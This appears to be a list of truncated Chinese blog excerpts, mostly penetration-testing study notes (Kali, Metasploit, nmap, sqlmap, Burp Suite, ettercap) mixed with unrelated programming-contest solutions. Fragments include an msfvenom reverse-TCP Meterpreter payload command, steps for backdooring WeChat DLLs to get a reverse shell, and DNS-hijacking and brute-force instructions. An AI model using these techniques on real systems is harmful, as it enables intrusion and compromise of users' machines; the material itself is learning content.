小编相信很多新手都会遇到以下几个问题 1.零基础想学渗透怎么入手? 2.学习web渗透需要从哪里开始? 这让很多同学都处于迷茫状态而迟迟不下手,小编就在此贴给大家说一下web渗透的学习路线,希望对大家有帮助 同时本博客也会按照学习路线推出渗透学习教学教程,希望大家能多多支持 本博客地址:http://www.cnblogs.com/cnhacker/ Web安全相关概念熟悉基本概念(SQL注入.上传.XSS.CSRF.一句话木马等). 通过关键字(SQL注入.上传.XSS.CSRF.一句话木马等…
代理查询网站:hidemyass(隐藏我的屁股) HTTrack:HTTrack是一个免费和易用的离线浏览工具(浏览器),它可以允许你下载整个WWW网站至本地目录,并且通过遍历网站目录获取HTML,图片和其他文件,是安全渗透测试和居家旅行必备软件.…
DNS服务器,域名解析服务器,端口默认53,UDP协议传输,服务器作业,将域名转成ip,将ip转成域名 sql server默认端口:1433,MSSQL是sql server简写 netstat -ano | findstr 端口号:查询系统是否有开启某端口 ftp.ichunqiu.com.:完全合格域名,"."根域 ,"com"顶级域,'qichunqiu'二级域,“ftp”主机名 域名查询过程,找浏览器缓存-->查询自己的hosts文件-->本地…
转载请注明出处. TCPDUMP:命令行网络抓包工具tcpdump -h tcpdump version 4.9.2 libpcap version 1.8.1 OpenSSL 1.1.0h 27 Mar 2018 Usage: tcpdump [-aAbdDefhHIJKlLnNOpqStuUvxX#] [ -B size ] [ -c count ] [ -C file_size ] [ -E algo:secret ] [ -F file ] [ -G seconds ] [ -i int…
一侦查 研究如何收集有关目标的情报,比如开发那些端口用来通信,托管在哪里,提供给客户的服务类型等. 交付内容应该包括需要攻击的所有目标资产清单,与那些资产关联的应用,使用的服务以及可能的资产所有者. 侦查目标: 找出目标 定义应用和商业用途 找出系统类型 找出可用端口 找出运行的服务 对信息进行社会工程 记录发现的内容 二目标测试 测试出目标的薄弱环节 找出容易受攻击的系统,并确定起优先级 讲易受攻击的系统和资产所有者进行映射 记录发现的内容 三漏洞利用 目标 漏洞利用 拿到权限 抓取非授权数据…
1.apt-get install python-nmap 2.apt-get install python-setuptools 正在读取软件包列表... 完成 正在分析软件包的依赖关系树       正在读取状态信息... 完成       python-setuptools 已经是最新的版本. python-setuptools 已设置为手动安装. 下列软件包是自动安装的并且现在不需要了:   libct4 libmapi0 libmapiadmin0 libocpf0 libsubuni…
考试的一道附加题~ 一看题目描述:把区间[l,r]里每个数异或上x,求区间[l,r]里所有数的异或和,这明显的要用数据结构或RMQ吧. 恩,所以正解就是线段树啦,至于树状数组行与否,不知道~ water_lift:这不是sb题嘛?线段树板子题都不会?把加法操作改成异或操作不就好啦? 其实好像真的是这样的,将加法操作改成了乘法操作: 然后你会发现自己只得了20分的暴力分,没错!相当于没写线段树! 因为线段树区间修改需要用到一个非常重要的东西: 懒标记 为什么要用到这个,直接暴力递归不好吗? 问得好…
大眼一看最下面的题意解释的话,发现这和洛谷P1310表达式的值挺像的,大概都是给定一些运算符号,让最后的表达式为true的概率,为false的概率啥的QwQ~: 然后这个题嘛?就是在所有的运算符中提溜出一个作为最后一次运算的运算符,然后我们去算这个运算符左边的那一堆式子,然后再算右边那一堆式子,最后再算一下最后一个运算符对应的运算就好啦! 那么怎么算这个运算符左边的式子和右边的式子呢?我们再从左边的式子中找出一个运算符最为最后一次运算的运算符,然后算它左边的式子,算它右边的式子…… 我们发现这就…
看到这个题之后,一个很暴力很直接的想法就是贴上题目中的代码然后交上去走人,但是很显然这是会TLE+MLE的,想想谁会这么傻把主要代码给你QwQ~: 其实这段代码是想告诉你一件事:用序列中的大数减去小数,直到序列中所有的数一样为止! 这就意味着最后的答案一定是某个数乘以 n! 证明: n=2的情况 想一想n=2的情况.这时这段代码的任务就是:用两个数中较大的数减去较小的数,一直到两数相等为止. 这不就是更相减损术吗! 代码如下: #include<iostream> #include<cs…
这题面有点难理解,建议直接跳到题意解释那一部分(虽然我觉得解释的不大对,但按照解释来做确实能AC): 按照“题意解释”的思路来思考这个题,那么就十分的简单了: 1.首先要读入这个字符矩阵,可以用cin(会不会TLE不知道),这里我用的是getchar读入: 2.从‘ * ’开始一遍广搜,记录一下每个‘ # ’被搜索到的时间,直到所有的点都被遍历过: 3.找出所有‘ # ’的位置时间最大的那个,就是第一问的答案,暂且记为much: 4.因为走过的格子每单位时间会增加1点高度,所以对于某一个格子 i…
.4. HTTP标准 1.4.1. 报文格式 1.4.1.1. 请求报文格式 <method><request-URL><version> <headers> <entity-body> 1.4.1.2. 响应报文格式 <version><status><reason-phrase> <headers> <entity-body> 1.4.1.3.字段解释 method HTTP动词 常…
目录 1.4 小试牛刀 1.4.1 信息搜集 whois查询 服务指纹识别 端口扫描 综合性扫描 1.4.2 发现漏洞 1.4.3 攻击与权限维持 小结 1.4 小试牛刀 本节作为第一章的最后一节,给大家展示一个渗透测试的简单示例.该示例操作简单,环境真实,主要是为了给您一个整体上的感知,同时提升学习渗透测试的兴趣.渗透测试的每一步并没有记录完整的细节信息. 首先,我选择了一个测试站点,下面对该站点www.xxxxoooo.cn,下面对其进行渗透测试. 1.4.1 信息搜集 whois查询 因为…
1.渗透测试基础内容 https://blog.csdn.net/Fly_hps/article/details/79492646 2.Metasploit基础 https://blog.csdn.net/Fly_hps/article/details/79493487 3.情报收集 https://blog.csdn.net/Fly_hps/article/details/79497893 4.漏洞扫描 https://blog.csdn.net/Fly_hps/article/details…
sunny.exe clientid 隧道ID route -n 查看网关netstat -rn 查看网关 DNS劫持ettercap用来内网渗透测试使用,可以嗅探内网,DNS劫持等攻击1,在攻击者电脑上,搭建web服务器2,终端打开ettercap的DNS文件,/etc/ettercap/etter.dns,在其中添加欺骗的A记录和PTR记录3,输入ettercap -G打开ettercap工具图形化界面4,开始主机扫描,在sniff选项下,选择 unified sniffing,选择需要嗅探…
该文章仅供学习,利用方法来自网络文章,仅供参考 the-backdoor-factory-master(后门工制造厂)原理:可执行二进制文件中有大量的00,这些00是不包含数据的,将这些数据替换成payload,并且在程序执行的时候,jmp到代码段,来触发payload. 测试靶机环境,win7系统,wechat(微信)2.6.8 靶机ip:192.168.190.129 目标:利用the-backdoor-factory-master对微信自己的dll动态连接文件植入后门,等微信运行之后,反弹…
Medusa(美杜莎)暴力破解使用 该文章仅供学习,利用方法来自网络文章,仅供参考 一.简介 medusa(美杜莎)是一个速度快,支持大规模并行,模块化,爆破登陆,可以同时对多个主机,用户或是密码执行强力测试,medusa和hydra一样,同样属于在线破解工具,不同的是,medusa的稳定性相较于hydra要好很多但是支持的模块相对于hydra少一些. 二,语法参数 medusha [-h host主机 或 -H file主机文件] [-u username 用户名 或 -U file用户名字典…
使用kali下metasploit生成木马,控制windows系统 kali基于debin的数字取证系统,上面集成了很多渗透测试工具,前身为bt r3(BrackTrack) Metasploit,是综合利用工具,使用Ruby开发,使用方便 msfconsole进入工具 MSF,依赖postgresql数据库,在使用MSF前要开启数据库 msfvenom:生成木马msfvenon -p windows/meterpreter/reverse_tcp lhost=kali ip地址 lport=5…
上一篇我们学习了Windows基础,今天我们来看一看作为一名渗透测试工程师都需要掌握哪些Linux知识.今天的笔记一共分为如下三个部分: Linux系统的介绍 Linux系统目录结构.常用命令 Linux系统网络配置 Linux系统的介绍 Linux的定义: 是由众多程序员通过Internet协作开发的开源(open source)系统,可以运行在PC机上的操作系统,风格和Unix类似. Linux的系统结构: Linux操作系统由内核及应用程序组成,不同的厂商根据各自的需要将各种应用软件和Li…
渗透测试工具BurpSuite做网站的安全测试(基础版) 版权声明:本文为博主原创文章,未经博主允许不得转载. 学习网址: https://t0data.gitbooks.io/burpsuite/content/chapter4.html 用命令打开burpsuite工具:jar /your_burpsuite_path/burpSuite.jar <<BurpSuite_pro_v1.6.27.zip>> BurpSuite 如何扫描web漏洞: http://www.myha…
目录 2.1 DNS信息收集1 2.1.1 whois查询3 2.1.2 域名基本信息查询4 Dns服务器查询4 a记录查询4 mx记录查询5 2.1.3 域名枚举5 fierse 5 dnsdict6 6 2.1.4 反向地址解析7 2.1.5 关于DNS区域传送漏洞8 小结11 2.1 DNS信息收集 从本节开始,我们从头开始,系统的学习基于Kali Linux的web应用渗透测试. 本章主要目标是从各个角度搜集测试目标的基本信息,包括搜集信息的途径.各种工具的使用方法,以及简单的示例. 按…
继续来学习metasploit...记好笔记是很重要的,下面开始正文: 二.WEB应用渗透技术     1.WEB应用渗透基础知识        先介绍WEB应用攻击的主要类型(大致介绍,具体请自行查询)         Sql注入攻击:大致分为 普通注入和盲注         跨站脚本(XSS): 分为存储型XSS,反射性XSS以及DOM型XSS         跨站伪造请求(CSRF):以XSS方式注入一段脚本,受害者点击该脚本时,脚本伪造受害者发出请求.         会话认证管理缺陷:…
Kali渗透测试系统集成了metasploit开源的漏洞测试框架,是渗透测试必备的神器.下面是我在学习metasploit的笔记,有什么错误的地方请指出来,我会立即纠正的~ 一.情报搜集     1.外围信息搜集       外围信息搜集又叫公开渠道信息搜集.搜索引擎,公共信息库,目标门户网站等等都是很好的入手点.metasploit有一类“辅助模块”,可以帮助你进行信息搜集的工作,并且还集成了nmap等神器.       1.1通过DNS和IP挖掘目标网站的信息            ①who…
kali安装,信息搜集,服务器扫描 kali介绍 Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统.由Offensive Security Ltd维护和资助.最先由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来完成,BackTrack是他们之前写的用于取证的Linux发行版 .Kali Linux预装了许多渗透测试软件,包括nmap .Wireshark .John the Ripper,以…
转载请注明出处:http://blog.csdn.net/zgyulongfei/article/details/41017493 作者:羽龍飛 本文仅献给想学习渗透测试的sqlmap小白,大牛请绕过. > > 对于网络安全人员来说,掌握渗透工具的使用方法是一项必备的技能.然而,一个没有师傅带领的小白在刚开始学习时,并不知道该如何入手进行渗透学习,所以本文旨在帮助这些小白入门. sqlmap是一款非常强大的开源sql自动化注入工具,可以用来检测和利用sql注入漏洞.它由python语言开发而成…
Web安全攻防 渗透测试实战指南   学习笔记 (四) Nmap                                       Network  Mapper    是一款开放源代码的网络探测和安全审核工具   nmap的相关参数和常用方法在此篇文章中已经注明~   https://www.cnblogs.com/0yst3r-2046/p/11012855.html     下面来介绍nmap的进阶用法~   1>脚本介绍   nmap的脚本默认存在 /xx/nmap/scrip…
Web安全攻防 渗透测试实战指南   学习笔记 (三) burp suite详解                                                 是一款集成化渗透测试工具(java编写,因此运行时依赖JRE,需要安装Java环境才可以运行)   安装JDK过程网上教程很多,可以根据自己需要的版本和操作系统来安装. 若在cmd中输入java -version  回车后返回版本信息则说明已经正确安装. 配置环境变量(参考网上教程) 若在cmd中输入javac  回车后…
Web安全攻防 渗透测试实战指南   学习笔记 (一) 第一章   信息收集     在信息收集中,最重要是收集服务器的配置信息和网站敏感信息(域名及子域名信息目标网站系统.CMS指纹.目标网站真实IP.开放端口)   收集域名信息         该域名的DNS服务器和注册人信息   1.Whois 查询           个人站点:得到注册人的姓名和邮箱信息  对于中小站点,管理员一般是域名所有人                  命令:whois   域名           在线who…
今天我们看看作为一个黑客对于Windows应该掌握哪些基础知识,主要内容包含以下四个方面: 系统目录.服务.端口和注册表: 黑客常用的DOS命令及批处理文件的编写: 黑客常用的快捷键,以及如何优化系统: 登录密码破解.手动清除木马病毒. 系统目录.服务.端口和注册表 系统目录 首先我们看看Windows系统都有哪些基本目录,他们的作用都是干什么的. Windows——操作系统的目录,有两个关键的位置渗透测试比较关心: Windows/System32——存放的的系统配置文件, Windows/S…
因 搜到一篇写渗透测试步骤比较详细的文章,转过来学习,方便时常看看. 内容如下: 一.信息搜集 主动/被动搜集 信息搜集分为主动信息搜集和被动信息搜集. 主动信息搜集就是通过直接访问和扫描信息的方式进行收集信息,缺点是会记录自己的操作信息: 被动信息搜集就是通过第三方服务进行信息搜集,缺点是收集信息有限. 信息搜集是很重要的一部分,信息越全面对后面的攻击越有帮助,可以先尽最大努力的使用被动信息搜集方式最大效果的搜集信息,再使用主动信息搜集的方式搜集非被动搜集不到的信息. 常用套路 1. 搜集网站…
上次我们使用 arpspoof 工具在命令行中完成了 arp 欺骗实验,今天我们用另一种工具 ettercap 工具来实现.ettercap支持图形化操作,对新手非常友好,并且操作非常简单, ettercap 工具 ettercap是一款现有流行的网络抓包软件,他利用计算机在局域网内进行通信的ARP协议的缺陷进行攻击,在目标与服务器之间充当中间人,嗅探两者之间的数据流量,从中窃取用户的数据资料. 安装命令如下: apt-get install ettercap-graphical 实验要求: 两…